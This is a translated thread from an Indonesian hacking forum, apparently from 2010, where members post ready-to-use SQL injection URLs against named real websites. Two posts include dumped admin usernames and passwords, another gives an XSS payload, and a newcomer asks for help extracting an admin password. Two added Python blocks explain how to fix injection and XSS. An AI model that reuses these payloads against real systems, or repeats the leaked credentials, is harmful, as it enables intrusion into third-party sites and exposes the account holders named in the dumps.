
Welcome to the Yogyafree Community

Welcome to the XCode - Yogyafree - Yogya Family Code community. Here we share computer knowledge with one another, including hacking, security, programming, software engineering and more.

Post site bugs here

Forum for discussing everything about web hacking, from footprinting, scanning, gaining access, privilege escalation, exploits, covering tracks and backdoors through to securing the web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Discuss bugs, penetration, exploitation and techniques for securing websites and web servers. Include a POC here so members can learn from it.

Re: Post site bugs here

Post by nesta » Wed Feb 10, 2010 1:16 am

http://www.itmaasia.com/news.php?id=-10+union+select+1,2,concat_ws(0x3a,%20admin_id,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+tb_admin--

:tapa: :tapa: :tapa:
imagination is far more important than knowledge
nesta
 
Posts: 555
Joined: Fri May 08, 2009 12:17 am

Re: Post site bugs here

Post by adit_coolz » Wed Feb 10, 2010 2:17 am

Code:
[+] URL:http://www.surfingqueensland.com.au/news.php?id=74+AND+1=2+UNION+SELECT+darkc0de,1,2,3--
[+] Evasion Used: "+" "--"
[+] 02:13:43
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
   Database: surf42ql_sq
   User: [email protected]
   Version: 5.0.89-community
[+] Dumping data from database "surf42ql_sq" Table "admin"
[+] Column(s) ['admin_id', 'admin_name', 'admin_pwd', 'admin_email']
[+] Number of Rows: 2

[0] 1:sqwebadmin:check49mate:[email protected]:
[1] 2:schooladmin:gongmi79:[email protected]:[email protected]:


scidies still learning, sorry if there are many mistakes :kaca:
adit_coolz
 
Posts: 13
Joined: Sun Aug 26, 2007 6:59 pm
Location: pAradIse

Re: Post site bugs here

Post by adit_coolz » Wed Feb 10, 2010 2:38 am

Code:
[+] URL:http://www.duralee.com/trim/sku_treasure.php?Book_id=3+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 02:37:34
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
   Database: duralee_search
   User: [email protected]
   Version: 5.0.82-msl-usrs-sure2-log
[+] Dumping data from database "duralee_search" Table "Administrators"
[+] Column(s) ['user_id', 'username', 'user_password']
[+] Number of Rows: 3

[0] 60:ted:phpwork:
[1] 61:mark:phpwork:
[2] 62:duralee:duralee:duralee:


:devil
adit_coolz
 
Posts: 13
Joined: Sun Aug 26, 2007 6:59 pm
Location: pAradIse

Re: Post site bugs here

Post by turfa » Wed Feb 24, 2010 4:16 am

Add the admin page too, please
turfa
 
Posts: 59
Joined: Sun Jan 10, 2010 11:16 am

Re: Post site bugs here

Post by peniru » Fri Feb 26, 2010 4:22 pm

here's an XSS bug.. don't know what to do with it... confused... :mati: :mati:

Code:
http://www.ivao.web.id/news.php?id=12&mid=%3Cscript%20language=%22javascript%22%3Ealert(%27halo%27)%3C/script%3E
.::. My Sign .::.
..noobie Pool..
Using tools or not is not the issue; what matters is being able to understand what you are doing
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
peniru
 
Posts: 387
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar

Re: Post site bugs here

Post by dark_superman » Fri Feb 26, 2010 8:29 pm

which one is the bug in the post above!!!! :circle:

why just 'halo'?? still confused!!! :putusasa:
dark_superman
 
Posts: 13
Joined: Mon Nov 17, 2008 3:44 pm

Re: Post site bugs here

Post by untouch » Fri Feb 26, 2010 9:57 pm

dark_superman wrote: which one is the bug in the post above!!!! :circle:

why just 'halo'?? still confused!!! :putusasa:


ha ha hay..
your post is funny too .. :omg:

methods of attacking a web app aren't only through SQL, bro..
untouch
 
Posts: 19
Joined: Fri Feb 26, 2010 11:36 am

Re: Post site bugs here

Post by peniru » Sat Feb 27, 2010 11:28 pm

dark_superman wrote: which one is the bug in the post above!!!! :circle:

why just 'halo'?? still confused!!! :putusasa:

http://www.ivao.web.id/news.php?id=12&mid=%3Cscript%20language=%22javascript%22%3Ealert(%27halo%27)%3C/script%3E

the bug:
%3Cscript%20language=%22javascript%22%3Ealert(%27halo%27)%3C/script%3E
or
<script language="javascript">alert('isi dengan kata yang kamu mau')</script>
-----------------------------------------------------------------------------------------------------
ideally the word 'halo' is not what should appear. it should be a warning or something like that... since I still don't understand how to inject with XSS, I can only show that much...
this is caused by the lack of a good filtering process for the input variable...

if I'm not mistaken, that is,, 'cause I'm still a newbie :circle: :circle:
.::. My Sign .::.
..noobie Pool..
Using tools or not is not the issue; what matters is being able to understand what you are doing
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
peniru
 
Posts: 387
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
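
The missing input filtering described in the post above, shown next to the fix. This is an added example, not code from the thread or from the affected site: it is written in Python as a stand-in for the page handler, the function names and HTML snippet are hypothetical, and it assumes `mid` is meant to be a small positive integer.

```python
import html
from urllib.parse import parse_qs

# Query string copied from the post above (host omitted).
QUERY = ("id=12&mid=%3Cscript%20language=%22javascript%22%3E"
         "alert(%27halo%27)%3C/script%3E")

def get_param(query, name):
    """Return the first percent-decoded value of a query parameter, or ''."""
    return parse_qs(query, keep_blank_values=True).get(name, [""])[0]

def render_unsafe(mid):
    # The reported behaviour: raw request input copied straight into HTML,
    # so the browser parses it as markup.
    return '<div class="menu">Menu: ' + mid + "</div>"

def render_safe(mid):
    # Output encoding: <, >, &, " and ' become entities, so the browser
    # shows the characters as text instead of interpreting them.
    return '<div class="menu">Menu: ' + html.escape(mid, quote=True) + "</div>"

def parse_menu_id(mid):
    """Input validation (assumption: mid should be a small positive integer).

    Returns the integer, or None when the value is anything else.
    """
    if mid.isascii() and mid.isdigit() and len(mid) <= 9:
        return int(mid)
    return None

if __name__ == "__main__":
    mid = get_param(QUERY, "mid")
    print("unsafe :", render_unsafe(mid))
    print("safe   :", render_safe(mid))
    print("valid? :", parse_menu_id(mid), "/", parse_menu_id("3"))
```

Validation rejects the request early, while encoding at output time is what keeps the page safe for any value that still reaches the template.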

Re: Post site bugs here

Post by Zinthink » Mon Mar 01, 2010 11:40 am

blackxnovo wrote:
Code:
http://www.ambonekspres.com/index.php?act=rubrik&catid=-9+UNION+ALL+SELECT+1,2,concat_ws(0x3a,User,Password),4,5,6,7,8+from+user--

it's all complete, I just don't know where the admin login page is hehehhe helPPPPpp
Zinthink
 
Posts: 6
Joined: Wed Aug 06, 2008 8:40 pm

Re: Post site bugs here

Post by culun2000 » Tue Mar 02, 2010 7:32 am

Excuse me, handsome sirs, I'd like to ask, being a newbie: does this indicate a bug on a website? http://www.milim.com/news.php?id=100%27
if so, how do I continue from there to get the admin pass, sir
Please teach me SQL injection, sir. I'm the new kid, sir.... :pusing: :pusing: :pusing:
culun2000
 
Posts: 1
Joined: Tue Mar 02, 2010 7:26 am
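
What a database error on a trailing quote in `id` indicates on the server side, and how the handler should treat the same input. This is an added example, not code from the thread or from any site named in it: it uses a constructed in-memory SQLite table in place of the site's MySQL database, and the table, column and function names are hypothetical.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for a site's news table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO news VALUES (100, 'Constructed headline')")
    return db

def fetch_concat(db, raw_id):
    # Flawed pattern: the parameter becomes part of the SQL text, so a stray
    # quote changes the statement's syntax and the database raises an error.
    sql = "SELECT title FROM news WHERE id = " + raw_id
    try:
        row = db.execute(sql).fetchone()
        return ("ok", row[0] if row else None)
    except sqlite3.Error as exc:
        # Showing this message to the visitor is what reveals the flaw.
        return ("db-error", str(exc))

def fetch_bound(db, value):
    # Bound parameter: the SQL text is fixed, so the value is only ever
    # compared as data, whatever characters it contains.
    row = db.execute("SELECT title FROM news WHERE id = ?", (value,)).fetchone()
    return ("ok", row[0] if row else None)

def fetch_validated(db, raw_id):
    # Defence in depth: reject anything that is not a short decimal integer
    # before it reaches the database, then bind it.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return ("rejected", None)
    return fetch_bound(db, int(raw_id))

if __name__ == "__main__":
    db = make_db()
    for value in ("100", "100'"):
        print(repr(value), fetch_concat(db, value),
              fetch_bound(db, value), fetch_validated(db, value))
```

With binding in place the quoted value simply matches no row, and the handler can answer with an ordinary "not found" page while logging database errors server-side rather than displaying them.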
